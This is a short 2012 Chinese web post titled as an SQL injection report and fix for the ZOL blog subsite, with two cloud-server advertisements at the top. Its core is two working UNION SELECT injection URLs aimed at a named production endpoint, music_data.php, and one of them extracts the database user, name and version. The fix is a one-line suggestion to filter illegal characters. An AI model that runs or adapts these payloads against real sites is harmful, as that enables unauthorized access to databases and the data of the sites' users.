中关村在线博客子站SQL注入及修复方案

  发布时间:2012-07-07 17:55:25   作者:佚名   我要评论
分析一下中关村的博客的漏洞
(福利推荐:【腾讯云】服务器最新限时优惠活动,云服务器1核2G仅99元/年、2核4G仅768元/3年,立即抢购>>>:9i0i.cn/qcloud

(福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun


http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5-- 
 
 http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5-- 



修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。 

相关文章

最新评论

?


http://www.vxiaotou.com